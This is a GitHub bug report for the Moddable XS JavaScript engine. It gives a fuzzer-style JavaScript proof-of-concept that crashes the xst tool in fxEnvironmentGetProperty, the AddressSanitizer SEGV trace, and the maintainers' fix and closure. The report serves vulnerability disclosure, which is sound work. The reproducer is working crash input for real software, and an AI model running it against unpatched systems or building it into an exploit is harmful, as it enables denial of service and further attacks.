Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

over access(fxEnvironmentGetProperty) #585

Closed
bird8693 opened this issue Feb 26, 2021 · 0 comments
Closed

over access(fxEnvironmentGetProperty) #585

bird8693 opened this issue Feb 26, 2021 · 0 comments
Labels
fixed - please verify Issue has been fixed. Please verify and close.

Comments

@bird8693
Copy link

Enviroment

operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc

poc:

function getHiddenValue() {
    var obj = {};
    var nEmw = new RegExp(null);
    var oob = 'value';
    var fun = eval(str);
    nEmw = new Object();
    oob = Object.assign('0', Object(521));
    var str = 'new String(\'\')';
    var fun = eval(str);
    let protoWithIndexedAccessors = {};
    var j = [];
    Object.assign(obj, fun);
    var fun = eval(str);
    return obj;
}
function makeOobString() {
    var hiddenValue = getHiddenValue();
    var str = 'constructor';
    var extern_arr_vars = [];
    let i = 0;
    var ijjkkk = 0;
    str = ijjkkk < 100000;
    function helper(i) {
        let a = new Array();
        var extern_arr_vars = [];
        if (ijjkkk < 100000) {
            makeOobString(a, protoWithIndexedAccessors);
        }
        return a;
        var oobString = makeOobString();
    }
    var j = [];
    var fun = eval(str);
    Object(fun, hiddenValue);
    var oobString = helper();
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        fun = makeOobString();
    }
    return oobString;
}
var oobString = makeOobString();
var oobString = makeOobString();
helper(oobString);
let protoWithIndexedAccessors = {};

description

ASAN:SIGSEGV
=================================================================
==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
    #0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
    #1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
    #2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
    #3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
    #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
    #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
    #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
    #7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
==5974==ABORTING
mkellner pushed a commit that referenced this issue Mar 15, 2021
XS: #585
ef5216c
@phoddie phoddie added the fixed - please verify Issue has been fixed. Please verify and close. label Mar 15, 2021
@phoddie phoddie closed this as completed Mar 23, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
fixed - please verify Issue has been fixed. Please verify and close.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@phoddie @bird8693